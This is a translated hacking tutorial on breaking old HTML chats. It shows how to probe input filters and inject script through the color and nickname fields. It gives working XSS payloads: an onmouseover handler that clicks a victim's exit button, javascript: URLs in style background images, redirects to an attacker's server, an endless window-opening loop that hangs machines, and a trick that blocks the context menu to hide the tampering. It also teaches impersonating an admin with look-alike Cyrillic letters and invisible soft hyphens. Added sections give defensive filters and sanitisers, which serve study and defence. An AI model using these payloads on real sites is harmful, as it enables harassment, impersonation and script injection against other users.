
Hacking Chat Part 1 (Theory and Practice)





  • This page does not in any way call for illegal activity, "cracking", etc. Its main goal is to study the features of HTML and to help prevent errors associated with its use. The author is not responsible for any illegal use of the information provided. The administrators of the chats concerned were informed by the author of all the errors found in them.
    All examples in the article were tested and work in MSIE 5.50.4134.0600. I cannot guarantee that they work in other versions, but I am sure that almost all of them will.

    Contents

    Hacking through the nickname (handler without quotes)
    Hacking through the nickname (handler enclosed in quotation marks)
    Hacking through the nickname (the filter does not pass quotes / the needed characters)
    Hacking through the color (attribute without quotes)
    Hacking through the color (attribute with quotes)
    Which characters to check the filters for
    Handler constraints
    Nickname spoofing, empty nicknames

    General theory

    Here I want to dwell on the basics of hacking chats. I apologize in advance to advanced readers: these methods have long been known and are as old as the hills. If you are advanced enough, you can skip ahead to the later chapters.

    First of all, note that every chat is original and unique in its own way (except, of course, for replicated copies of the same engine). Therefore there are no absolutely universal hacking methods. Almost every chat has peculiarities that must be taken into account, and without which canned templates will not work.

    What do I actually mean by hacking an HTML chat? Not banal flooding, and not an attack on the IP address of the chat server. By hacking I mean an unauthorized modification of the chat's HTML document, or access to its hidden parts (for example, private messages), i.e. an effect on the chat that was neither intended nor permitted for users. This applies equally to forums, guest books, etc., where all the methods described below also work (and often work even better, since such forms are as a rule protected worse than chats).

    Everything described applies only to HTML chats. Hacking Java chats is a separate and completely different story. I hope you can tell one kind of chat from the other :) )

    So, we are at the door of an HTML chat. Suppose we want to test its "strength". What do we do first? First of all, we connect through an anonymous proxy (I hope you know what that is). This is needed for two reasons: first, it gives us anonymity (so that the admin does not come after us), and second, if the admin does not like our experiments and blocks us, we can switch to another proxy with a different IP address and enter the chat again. There is one catch: some chats do not allow entry through public proxies.

    Next we must find out what weapons we actually have, i.e. which attributes the user can set. As a rule, every chat lets you enter the user's nickname and the user's color. In addition, it is sometimes possible to set the user's e-mail address, home page, gender, chat refresh rate, etc. In practice, the fields of interest are the color, the nickname, the e-mail address and the home page: they are inserted directly into the body of the document, and so it is through them that the chat can be attacked. Note that some chats require registration; some attributes are then set during registration and others immediately before entering the chat (or already inside it). Chats with registration are usually more serious and better protected.

    Let us identify the possible attack paths. First, look at the fragment of the form in which the color of our messages is set (by the way, the color can be set separately for the nickname and for the message text; check both, since the chat may process them differently). Why is color the first thing that interests us? Because the color ends up inside a tag, in its attributes, unlike, for example, the nickname, which most often appears in the body of a tag. And to hack the chat we need to get inside a tag's attributes, so that we can change them or insert our own script. (Sometimes, of course, tags can simply be written in the message body; until recently this worked, for example, in chat.rambler.ru, but this case is so trivial that such chats probably no longer exist, and I do not consider it.)

    What interests us is the form in which the color information is sent to the server. The least protected variant is the string type, when the color is transmitted as its own name. For example:

    <select name=youcolor style="width: 70px">
    <option value=blue>blue
    <option value=red>red
    <option value=darkred>dark red
    <option value=green>green
    <option value=black>black
    <option value=lightblue>light blue
    </select>

    Such a chat can, as a rule, be broken to one degree or another. :) A worse option is when the color is sent as a numeric code:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>blue
    <option value=#AF0000>red
    <option value=#FF0000>dark red
    <option value=green>green
    <option value=#000000>black
    <option value=#0000AF>light blue
    </select>

    In such a chat there may be a filter that passes only digits, the # sign and the letters A, B, C, D, E and F. Then hacking through the color can be forgotten.

    And finally, the worst case (for the attacker) is when the color is transmitted simply as an index into a list of valid colors:

    <select name=youcolor style="width:70px">
    <option value=1>blue
    <option value=2>red
    <option value=3>dark red
    <option value=4>green
    <option value=5>black
    <option value=6>light blue
    </select>

    As a rule, such a chat cannot be cracked through the color (and often cannot be cracked at all). This is the most secure option (which, by the way, I recommend to chat developers).

    Next we need to change the HTML so that we can freely send arbitrary attribute values to the server. To do this, save the page to disk and change the chat login (or registration) form as follows: change the relative address in the form's action attribute to the full address; replace all hidden inputs with text inputs and select elements with text inputs; and remove any restriction on the length of the input values (maxlength), if there is one. For example, if the original form was:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Then after appropriate replacements we get:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Note that the document may be generated dynamically with functions such as document.write(); then most likely you will have to convert it to a static form. It also often happens that after saving the HTML to disk the chat does not open. This may be because the site consisted of frames and was not saved completely; in that case study the structure of the page more carefully and save everything properly. Another reason may be that the server checks the Referer field of the HTTP request header and notices that we did not come from its own page. In that case other methods are needed, which we will come back to in the chapter "Hacking at the HTTP level".

    Now we can experiment with the chat. First of all we need to find out what filters are applied to the entered values (first the color and the nickname). We are primarily interested in the following characters:

    " ' ` = < > ; \ & % and the space

    We enter them into the color and nickname fields, enter the chat (if it lets us in with such attributes; if not, we will have to try the characters one by one), and see which characters the filter let through (by writing something like "hello" in the chat and looking at which characters of the color and nickname are present in the HTML). Some chats simply remove the filtered characters, some replace them with other characters, and some convert them to an encoded form such as the entity &lt;. Converted characters are of no use to us, because HTML no longer treats them as markup (for more details, however, see the chapter "A few more hacks of the long-suffering chat T").

    As a result, we should have a list of skipped characters for each attribute of the registration form.
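    As an added example (not part of the original article), here is a small script that automates this check: it builds a probe string with a marker before each interesting character, then classifies what the chat did to each one from the text that comes back. The chat-side filter in the script is a constructed stand-in; against a real chat, the probe goes into the nickname or color field and `observed` is whatever appears between the markers in the saved HTML of the message frame.

```javascript
// Added example, not from the original article: automate the filter probe.
// The chat-side filter (fakeChatFilter) is a constructed stand-in; against a
// real chat the probe goes into the nickname or color field and `observed`
// is the text that comes back in the HTML of the message frame.

const PROBE_CHARS = ['"', "'", '`', '=', '<', '>', ';', '\\', '&', '%', ' '];

// Entity spellings a filter may substitute for a character.
const ENTITIES = {
  '"': ['&quot;', '&#34;', '&#x22;'],
  "'": ['&#39;', '&apos;', '&#x27;'],
  '<': ['&lt;', '&#60;', '&#x3C;'],
  '>': ['&gt;', '&#62;', '&#x3E;'],
  '&': ['&amp;', '&#38;', '&#x26;'],
};

// Marker "mNm" (letters and digits pass every filter) precedes each probe
// character; "mendm" closes the probe so the last character can be located.
const marker = i => `m${i}m`;
const END_MARKER = 'mendm';

function buildProbe(chars = PROBE_CHARS) {
  return chars.map((c, i) => marker(i) + c).join('') + END_MARKER;
}

// Classify each probe character as passed / removed / encoded / replaced by
// reading what survived between its marker and the next one.
function analyseProbe(observed, chars = PROBE_CHARS) {
  const result = {};
  chars.forEach((c, i) => {
    const start = observed.indexOf(marker(i));
    const next = i + 1 < chars.length ? marker(i + 1) : END_MARKER;
    const end = start < 0 ? -1 : observed.indexOf(next, start);
    if (start < 0 || end < 0) { result[c] = 'marker lost'; return; }
    const got = observed.slice(start + marker(i).length, end);
    if (got === c) result[c] = 'passed';
    else if (got === '') result[c] = 'removed';
    else if ((ENTITIES[c] || []).includes(got)) result[c] = 'encoded';
    else result[c] = `replaced with ${JSON.stringify(got)}`;
  });
  return result;
}

// The characters we can actually use in a payload.
function passedChars(analysis) {
  return Object.keys(analysis).filter(c => analysis[c] === 'passed');
}

// Constructed stand-in for a chat filter: strips angle brackets, encodes
// double quotes, turns backslashes into underscores, passes everything else.
function fakeChatFilter(s) {
  return s.replace(/[<>]/g, '').replace(/"/g, '&quot;').replace(/\\/g, '_');
}

const observed = fakeChatFilter(buildProbe());
const analysis = analyseProbe(observed);
console.log(analysis);
console.log('usable in payloads:',
  passedChars(analysis).map(c => (c === ' ' ? 'space' : c)).join(' '));
```

    Run it once per field (color, nickname, e-mail, home page), since the chat may filter each one differently; the list printed at the end is the alphabet available for that field.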

    Next we face the task of getting inside some tag in order to change its attributes or insert our own script there. There are two fundamentally different ways to do this. The first: the code we need is passed through attributes that already sit inside a tag (i.e. between the angle brackets), for example the color or the e-mail address. The second: break the structure of the HTML so that the code we need ends up inside a tag. Which to use is determined by analysing the specific structure of the chat's code and the set of unfiltered characters for our attributes. We will consider various hacking options in the following examples. In the meantime, I would like to dwell on some features of HTML that actually allow us to produce the interesting "effects".

    HTML features

    Here I am not going to give a lecture on HTML for dummies. I assume you know what a tag and its attributes are, are familiar with JavaScript, and have written at least one web page in your life in HTML (and not in FrontPage).

    The biggest trouble (and at the same time the strength) of HTML is that it has no single standard. That is, there seems to be one, but the standards are so varied, and so many of them are intertwined in HTML, that nobody knows it thoroughly (and often does not even know what it is). In addition, competition among browsers and the variety of sites leads browsers to try to support as many standards and technologies as possible. And the lack of common standards means that webmasters manage to mix different styles even on a single page :o(. Yet this is precisely what allows hackers to break HTML, and what gives developers such a headache.

    A simple question: what are the delimiters in HTML and JavaScript? Even I cannot immediately give an unambiguous answer. Consider an example:

    <font onclick= "alert()">Text</font>

    Everything here is clear and obvious: a tag with a click event handler written in JavaScript, whose text is enclosed in double quotes. That JavaScript is used can be stated explicitly:

    <font onclick="javascript:alert()">Text</font>

    The string delimiters in these examples are double quotes. But you can do without them: HTML allows the quotes around an attribute value to be omitted when the value contains no whitespace (and none of a few other special characters), and this applies to event handlers as well. Thus this construction also works:

    <font onclick=alert()>Text</font>

    and now, instead of an empty message, let us insert something meaningful:

    <font onclick=alert('Привет друзья!')>Text</font>

    Trying this example shows that it does not work. The reason: an unquoted attribute value ends at the first space, even if that space sits inside the quotes of the JavaScript string. The browser therefore takes only the fragment alert('Привет as the handler and the rest, друзья!'), as a new attribute name; when the handler is later compiled as JavaScript, the unterminated string produces an error message. Why does the browser not notice that the space is inside quotes? Because two languages are mixed here, HTML and JavaScript. The HTML parser "saw" that no quote followed the = sign and so looked for a space as the end of the attribute value; at that moment it was not interested in the inside of the handler, since that is JavaScript and not HTML. So it simply ignored the opening quote of the JavaScript string and took the space as the end of the attribute value. The following constructions work without errors:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    Note an important feature: if an attribute value is in quotes, the space before the next attribute can be omitted (third line of the example). The fourth line also works (in the sense that the browser does not complain, although the script of course does not run), since the browser does not treat the contents of the color attribute as JavaScript and therefore does not complain about the unbalanced quote, even though only alert('Привет ends up in the color value. (An arbitrary string can serve as a color in HTML; the browser converts it to some numeric value that it takes to be a color.)

    Are there other characters, besides the space and the > character, that terminate an unquoted handler? The question is open. I do not know of any, but I admit that they may exist. (For today's browsers the HTML5 parsing algorithm settles it: an unquoted attribute value ends at any ASCII whitespace, i.e. space, tab, line feed, form feed or carriage return, or at >.)

    As can be seen from the examples above, double and single quotes can serve as string delimiters. This applies equally to HTML and JavaScript; however, it turns out that there is at least one more character that terminates a string in HTML (but not in JavaScript!): the backquote ` (usually on the same key as the letter ё). You can check it with the following example:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    I bet that at least 90% of webmasters do not know about this! In any case, I have not yet seen anyone use the backquote. This character is a find for a hacker. :) )

    Caveat: backquote-delimited attribute values were a quirk of the legacy Internet Explorer parser. In the HTML5 parsing algorithm the backquote is an ordinary character, so the value above is unquoted, ends at the first space, and the trick does not work in a standards-mode parser.

    It often happens that one kind of quotation mark has to be used inside another. This is difficult, especially if the chat passes only one kind of quote. But it turns out that string constants can be nested inside other string constants using the same quotes! For example:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    The example uses nested single quotes, yet the interpreter does not throw an error. Note that the contents of the inner quotes are not arbitrary: there must be no spaces, and some characters are not allowed at the end, for example ; or ).

    Caveat: this, too, is behaviour of the legacy Internet Explorer parser. A standards-mode HTML parser ends a quoted attribute value at the first matching quote, and a JavaScript engine ends a string literal at the first unescaped matching quote, so do not count on it in current browsers; the portable workarounds are the other kind of quote, a backslash escape, or String.fromCharCode().

    Now let us talk about links. First, note that the Internet grew up by mixing completely different technologies, and information can be reached through many different protocols. Therefore, when the full path to a document (URL) is specified, any scheme the browser knows may be used. Notably, javascript: is also handled as a URL scheme (it is not a network protocol, but the developers apparently decided that a separate concept for scripts would be too bold and ranked it among the protocols). Therefore, wherever a URL can be specified in an HTML document, a script can be inserted, and it will be executed as soon as the user (or the browser itself) requests that link. For example:

    <a href=javascript:alert()>Text</a>

    Interestingly, besides statements, a javascript: link can simply contain a string (or numeric) value (it must come last, after any statements). When such a link is clicked, the browser first executes the statements and then opens a new document containing the value of the last expression in the link:

    <a href=javascript:alert();'Hello!!'>Text</a>

    Note that tags cannot be inserted into the new page this way.

    Hacking chat R

    I will give an example of one of the first chats I hacked. This chat was very simple, and was hacked, as they say, on the first try :) )

    Few chats are left in which this still works. I thought of these methods myself, but later I found them in hacker magazines as well.

    The login form of this chat corresponded exactly to the form given in the chapter "General theory". After converting the form and saving it to disk, I checked which characters pass through in the color attribute. It turned out that the following characters pass (of those of interest, see the chapter "General theory"):

    ' ` = ; % and the space

    And, of course, all digits and letters passed. The length of the color value string was not limited. Next I looked at exactly where the color is inserted in the message frame. Here is a snippet of that frame:

    <font color=Black><b>Путник</b>- Alpha, hi ))</font>
    <font color=Red><b>Alpha</b>- Hi everyone !!</font>

    As you can see, the color is inserted without surrounding quotes. That suited me. I logged in under the name Shram (well, almost that nickname ;)) and the color red size=20. My message looked like this:

    <font color=red size=20><b>Algol</b>- Hi</font>

    It was displayed in very large type, which somewhat surprised the chat population :) )

    Thus, although we cannot insert tags directly, the permission to put a space into the color attribute allowed us to set unauthorized tag attributes. But that was certainly not enough for me. Changing the font size is cute, but anything really useful can only be done with scripts. I could not insert a script tag directly (or rather, at the time I did not yet know how). But I could set a handler for some event of the tag. Here is the color I set in order to throw a certain moron out of the chat:

    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30

    Then I sent him a long, long message in private. I chose the message color so that it did not differ from the background. And the font size and message length were so huge that the victim was bound to pass the mouse over the message at least once, whereupon my onmouseover handler clicked the "leave chat" button on the user's behalf :) )

    However, clever people gradually appeared who figured out the joke and deliberately did not move the cursor over the chat window. My script did not always work :( . At first I thought there was no way out: since I could only insert a script as an event handler, if the event does not occur, the script does not run. But, digging through the "annals", I found a solution (now trivial and widely known). It turned out that the URL of a background image can be specified for a tag in the style attribute. And where a URL can be specified, a script can be written too. The main thing is that the background image is loaded by itself when the HTML document loads! If I wanted to show an alert to the chat participants, I logged in with the following color:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    An important detail: since most HTML chats are structured so that the page is refreshed regularly, a script sent this way is executed not once but many times, until our message disappears from the screen. (Executing javascript: URLs inside CSS url() was a feature of old Internet Explorer; current browsers do not run scripts from style properties.)

    And here is what the color attribute value looked like for throwing someone out of the chat:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    Remember: a script sent in private is seen not only by your "interlocutor" but also by yourself, so you need to know how to protect yourself from its effect. This can be done in two ways: either put yourself on ignore (then we will not see our own messages), or disable the display of images in the browser settings; then a script that works through a background image will not run.
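    To make the defect concrete, here is an added example (not code from the original article or from the chat) of the kind of message template this chat used, beside a hardened version that follows the advice from the chapter "General theory": the form sends an index into a server-side palette, the attribute is quoted, and the nickname and text are escaped. The function names and the palette are assumptions for the example.

```javascript
// Added example, not from the original article: the kind of template the
// chat used, beside a hardened version. Function names and the palette are
// assumed (the hex codes are taken from the numeric-code form shown earlier).

// Vulnerable: the user-supplied color lands unquoted inside the tag, so a
// space in it starts a new attribute (size=, onmouseover=, style=...).
function renderVulnerable(color, nick, text) {
  return `<font color=${color}><b>${nick}</b>- ${text}</font>`;
}

// Escape the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened, variant 1 (the scheme the article recommends): the form sends
// an index into a server-side list, so no user text reaches the attribute.
const PALETTE = ['#0000FF', '#AF0000', '#FF0000', '#008000', '#000000', '#0000AF'];
const DEFAULT_COLOR = '#000000';
function resolveIndexedColor(value) {
  const idx = Number(value);
  return Number.isInteger(idx) && idx >= 1 && idx <= PALETTE.length
    ? PALETTE[idx - 1]
    : DEFAULT_COLOR;
}

// Hardened, variant 2: if a free-form color must be accepted, allow only a
// strict #RRGGBB code (the "digits, # and A-F" filter, anchored at both ends
// so that nothing can follow the code).
const HEX_COLOR = /^#[0-9A-Fa-f]{6}$/;
function resolveHexColor(value) {
  return HEX_COLOR.test(value) ? value.toUpperCase() : DEFAULT_COLOR;
}

// The attribute is quoted and the nickname and text are escaped, so neither
// a space nor a quote in any field can break out of its position.
function renderHardened(colorIndex, nick, text) {
  return `<font color="${resolveIndexedColor(colorIndex)}"><b>${escapeHtml(nick)}</b>- ${escapeHtml(text)}</font>`;
}

// The color-field payloads described in the article.
const PAYLOADS = [
  'red size=20',
  '#A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30',
  "style=background-image:url(javascript:alert('hi'));",
];

for (const p of PAYLOADS) {
  console.log('vulnerable:', renderVulnerable(p, 'Algol', 'Hi'));
  console.log('hardened:  ', renderHardened(p, 'Algol', 'Hi'));
}
```

    The point of the indexed variant is that the attribute value is chosen by the server, never by the client; the anchored regular expression is the fallback when a free-form color really is required. Note that an unanchored check such as /#[0-9A-F]{6}/ would still accept the onmouseover payload above.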

    Now I want to show some useful scripts that can be used in hacked chats:

    javascript:navigate('http://myserver.ru'); loads the myserver.ru site into the current frame (or page). (navigate() exists only in Internet Explorer; the portable equivalent is location.href='http://myserver.ru'.)
    Some chats, on seeing the fragment http://, treat it as a link and automatically wrap it in an <a> tag. Since that would destroy our script, it must be avoided. To do so, simply omit the http: prefix (which is the default anyway). The script then looks like this: javascript:navigate('//myserver.ru'); The two leading slashes are mandatory.

    javascript:parent.frames[2].document.location='http://myserver.ru' loads myserver.ru into one of the frames.

    javascript:for(;;)open() opens an endless number of windows (if you do not navigate away in time, it will hang the machine and later force a reboot).

    javascript:document.write('<script>alert()</script>') replaces the current frame with a script, which is then executed. Note: if the chat does not pass the < and > characters (and that is the overwhelming majority of chats), we cannot insert such a script directly. But there is a way out: the unescape() function, which decodes %XX escape sequences into the corresponding characters. Replace the angle brackets with unescape() calls with the corresponding codes, and the script takes this form:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E'))

    (If % is filtered but parentheses pass, String.fromCharCode(60) and String.fromCharCode(62) produce the same two characters.)

    javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' inserts a picture after the text. Note that in IE 5.x any tag can be inserted this way except FRAME, IFRAME and SELECT, whereas in IE 4.x createElement() only allows the IMG, AREA and OPTION tags. I have no information about Netscape; you can experiment yourself.

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' blocks the page's context menu, and thereby makes it impossible to view the HTML source of the frame through it. This lets you hide your tampering with the body of the chat :) ) (Only from casual users: the browser's View Source menu item and, today, the developer tools still show the frame's source.)

    Nickname spoofing, empty nicknames

    Sometimes it is useful to log in under someone else's nickname. Chats with user registration will not let you do this unless you know the password (which you most likely do not). The banal way out: register a nickname in which a letter of the Latin alphabet is replaced by the very similar letter from the Russian layout. For example, log in under the nickname admin with the Latin a replaced by the Cyrillic а. The method is primitive, but it works )). There are harder cases; for example, some chats forbid mixing characters from different layouts in one nickname. Then the inquiring mind has no choice but to turn to Uncle Gates for help. And here, out of human kindness, Microsoft did not forget about us sinners and gave us the character &shy; (the soft hyphen, U+00AD, also %AD in URL encoding), which Microsoft itself calls "Soft hyphen" ("short hyphen"). It really does look like a hyphen in Word, in Excel and even in Notepad, but not in IE! For Internet Explorer the character simply does not exist; that is, it seems to be there, but nobody made a glyph for it. It simply does not show up on the HTML page! Thus, by adding a soft hyphen to any nickname and registering under it, we enter the chat with a nickname that looks on the HTML page exactly like the nickname without the hyphen. It can be made even cooler: log in with a nickname that consists only of soft hyphens. Then your nickname will not be displayed in the chat at all, an absolutely empty place )).

    (Note: having tinkered a bit more with the soft hyphen, I did find cases in which it does appear, and only as a hyphen: if a word containing a soft hyphen falls at the end of a line, the part of the word after the hyphen is carried to the next line and the hyphen itself becomes visible! So the invisibility of the hyphen is a deliberate feature of Microsoft's (which, however, does not reduce its usefulness for hacks :) ). It is still unclear why it remains always visible in other applications.) Caveat: this is exactly the behaviour Unicode defines for U+00AD, a discretionary hyphen that is rendered only where a line is actually broken, so it is not an IE quirk; every current browser renders it the same way, and a nickname check has to strip it explicitly.
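    For the defending side, here is an added example (not from the original article) of a registration check that defeats both tricks from this chapter: it strips invisible format characters such as the soft hyphen before comparing nicknames, folds Cyrillic look-alikes onto their Latin twins so that "admin" with a Cyrillic а collides with the real admin, rejects names that are empty after normalisation, and flags mixed Latin/Cyrillic names. Function names are assumptions, and the confusables table is a small hand-picked subset of Unicode's confusables data, not the full list.

```javascript
// Added example, not from the original article: canonicalise nicknames so
// that invisible characters (soft hyphen and friends) and Cyrillic/Latin
// look-alikes cannot impersonate an existing user or produce an empty name.
// Names are assumed; CONFUSABLES is a small hand-picked subset of the
// Unicode confusables data, not the full list.

// Cyrillic letters whose glyphs are (near-)identical to Latin ones.
const CONFUSABLES = {
  '\u0430': 'a', '\u0435': 'e', '\u043E': 'o', '\u0440': 'p', '\u0441': 'c',
  '\u0443': 'y', '\u0445': 'x', '\u0456': 'i', '\u0458': 'j', '\u0455': 's',
  '\u0410': 'A', '\u0412': 'B', '\u0415': 'E', '\u041A': 'K', '\u041C': 'M',
  '\u041D': 'H', '\u041E': 'O', '\u0420': 'P', '\u0421': 'C', '\u0422': 'T',
  '\u0425': 'X', '\u0406': 'I', '\u0408': 'J', '\u0405': 'S',
};

// Drop every "format" character (Unicode category Cf): soft hyphen U+00AD,
// zero-width space/joiner/non-joiner U+200B..U+200D, word joiner U+2060, BOM.
function stripInvisible(s) {
  return s.replace(/\p{Cf}/gu, '');
}

// Canonical form used for uniqueness checks: compatibility-normalised,
// invisible characters removed, look-alikes folded to Latin, lower-cased,
// whitespace collapsed.
function canonicalNick(raw) {
  const visible = stripInvisible(String(raw).normalize('NFKC'));
  const folded = Array.from(visible, ch => CONFUSABLES[ch] || ch).join('');
  return folded.toLowerCase().replace(/\s+/g, ' ').trim();
}

// True when a nickname mixes Latin and Cyrillic letters (the rule some chats
// already enforced against the layout-swap trick).
function mixesLatinAndCyrillic(raw) {
  const visible = stripInvisible(String(raw).normalize('NFKC'));
  return /\p{Script=Latin}/u.test(visible) && /\p{Script=Cyrillic}/u.test(visible);
}

// Registration check. `existing` holds the canonical forms of taken names,
// so stored names must be passed through canonicalNick() as well.
function checkNick(raw, existing) {
  const canonical = canonicalNick(raw);
  if (canonical === '') return { ok: false, reason: 'empty after normalisation', canonical };
  if (existing.has(canonical)) return { ok: false, reason: 'collides with existing nickname', canonical };
  if (mixesLatinAndCyrillic(raw)) return { ok: false, reason: 'mixed Latin and Cyrillic', canonical };
  return { ok: true, reason: null, canonical };
}

// Constructed demo: the tricks from this chapter against a registered "admin".
const taken = new Set(['admin']);
for (const candidate of ['\u00AD\u00AD', 'adm\u00ADin', '\u0430dmin', 'Alpha']) {
  console.log(JSON.stringify(candidate), '->', checkNick(candidate, taken));
}
```

    The check runs on the canonical form but the chat may still display the name as typed; what matters is that two names which render the same can no longer both be registered. A production version would load the full Unicode confusables table instead of the short map above.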


